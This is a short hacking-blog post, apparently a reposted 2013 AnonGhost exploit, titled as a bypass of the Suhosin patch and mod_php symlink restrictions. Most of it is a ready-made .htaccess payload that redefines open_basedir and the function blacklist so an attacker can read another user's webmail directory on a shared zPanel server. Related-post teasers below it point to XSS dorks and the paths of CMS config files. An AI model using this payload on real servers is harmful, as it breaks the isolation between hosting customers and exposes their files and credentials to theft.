#Title:Bypass MOD_PHP Symlink From Sihosin Patch
#Description:Symlink Server By Escaping MOD_PHP and Turning off the Cross-user Security to any another Path.
#Data:30/10/2013
#Auhor:Mauritania Attacker & Virusa Worm
#Greetz:All AnonGhost Memberz
/var/zpanel/hostdata/ ====> Path of Websites.
/zadmin/public_html/webmail_mydomain_com ====> our Target.
/var/zpanel/temp/ =====> Path where we can read our Bypass.
#For PHP Version 5
<IfModule mod_php5.c>
php_admin_value open_basedir
"/var/zpanel/hostdata/zadmin/public_html/webmail_mydomain_com:/var/zpanel/temp/"
php_admin_value suhosin.executor.func.blacklist "passthru, show_source, shell_exec, system, pcntl_exec, popen, pclose,
proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, apache_child_terminate, posix_kill,
posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, escapeshellcmd, escapeshellarg, exec" Options
FollowSymLinks Indexes AllowOverride All Order Allow,Deny Allow from all
</IfModule>
#For PHP Version 4
<IfModule mod_php4.c>
php_admin_value open_basedir
"/var/zpanel/hostdata/zadmin/public_html/webmail_mydomain_com:/var/zpanel/temp/"
php_admin_value suhosin.executor.func.blacklist "passthru, show_source, shell_exec, system, pcntl_exec, popen, pclose,
proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, apache_child_terminate, posix_kill,
posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, escapeshellcmd, escapeshellarg, exec" Options
FollowSymLinks Indexes AllowOverride All Order Allow,Deny Allow from all
</IfModule>
Related Posts
- Path file config một số code04 Mar 20150
Vbulletin: public_html/includes/config.phpPHPBB: public_html/config.phpJoomla: public_html/conf...Read more »
- Phương pháp kiểm tra lỗi XSS02 Mar 20150
Sử dụng các dork sau để tìm kiếm trên google inurl:".php?cmd=" inurl:".php?z=" inurl:".php?q=" inur...Read more »
- XSS cơ bản02 Mar 20150
XSS - Cross Site Scripting, tránh gọi tắt CSS trùng với Cascading Style Sheet. XSS là lỗ hổng của We...Read more »
- Chap 25 - Những kiến thức cơ bản để trở thành hacker : SNIFFING01 Mar 20150
1. Sniffing là gì Nghe lén (Sniffing) được hiểu đơn giản là một chương trình cố gắng nghe ngóng các ...Read more »
- Chap 24 - Những kiến thức cơ bản để trở thành hacker : SCANNING NETWORK01 Mar 20150
800x600 1. Giới thiệu về Scanning Quét (Scanning) là một bước tiếp theo trong tiến trình tấn...Read more »
Đăng ký:
Đăng Nhận xét (Atom)
Đăng nhận xét Blogger Facebook
Click to see the code!
To insert emoticon you must added at least one space before the code.